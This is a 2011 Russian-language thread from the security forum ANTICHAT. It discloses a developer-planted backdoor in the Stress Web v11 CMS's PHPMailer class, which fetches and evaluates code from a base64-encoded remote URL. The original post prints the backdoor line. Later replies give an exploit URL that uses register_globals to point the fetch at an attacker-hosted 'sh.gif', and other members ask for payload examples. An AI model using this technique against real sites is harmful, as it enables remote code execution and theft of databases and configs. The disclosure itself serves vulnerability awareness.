ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

06.10.2011, 18:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 2515
Репутация:
0
|
|
Итак, 2ая за сегодня найденная уязвимость в стресс вебе(stress web) v11. Данной уязвимости подвержены абсолютно все сайты, nulled и не nulled версий. Абсолютно любой сервер стоящий на stress web может быть взломан самим разработчиком
Мы все понимаем, что разработчик тоже должен кушать и стремиться к защите своих авторских прав, но подобное не допустимо в коде столь популярного продукта.
Вся беда в том, что данной уязвимости может быть подвержен даже лицензионный сайт и не важно платили вы или нет - ваша безопасность ровно на 1 уровне.
Ну теперь перейдем к самой уязвимости. Зашита она разработчиком, в классе PHPMailer, /inc/classes/class.phpmailer.php. Рассмотрим ее:
Код:
Code:
private function shBody(){return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif');}
Значение shHostname - aHR0cDovL25ldy5zdHJlc3N3ZWIucnUv, после base64_encode принимает значение: http://new.stressweb.ru/
Вызывается эта функция вот так: PHPMailer::startSh()[псевдолинки shIsAuth()->shEval()->shBody()].
В результате, если владелец stressweb по адресу new.stressweb.ru/sh.gif разместит вредоностный код, он сможет быть исполнен АБСОЛЮТНО НА ЛЮБОМ сайте с веб-обвязкой stressweb, абсолютно похеру, есть там лицензия или ее нет.
А теперь реальный пример - захотел наш "stressweb" убить 1 фришку, заложил вредоностный код на своем сайте в sh.gif и пошел вайпить чей то сервер, умные ребятки в это время заметили этот код и пошли вайпить то, что они захотят ... или получать доступ к базам/конфигам и прочему. Вот вам яркий пример халатности разработчика.
|
|
|
|

06.10.2011, 19:24
|
|
Новичок
Регистрация: 04.06.2010
Сообщений: 0
Провел на форуме: 1263
Репутация:
0
|
|
умельцы, рассказывайте, как ее заюзать нам)
|
|
|

06.10.2011, 19:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 60692
Репутация:
6
|
|
Требование:
register_globals = on
http://site.ru/index.php?f=stat&shHostname=тут закодированный URL в base64
Как я понял... Правильно?
|
|
|
|

06.10.2011, 20:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 2515
Репутация:
0
|
|
Да, заливаете sh.gif внутри код вредоносный
|
|
|
|

06.10.2011, 22:13
|
|
Новичок
Регистрация: 04.06.2010
Сообщений: 0
Провел на форуме: 1263
Репутация:
0
|
|
какого рода должен быть код?
лучше на примере
и юзать точно так?
http://site.ru/index.php?f=stat&shHostname=тут закодированный URL в base64
почему именно f=stat?
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|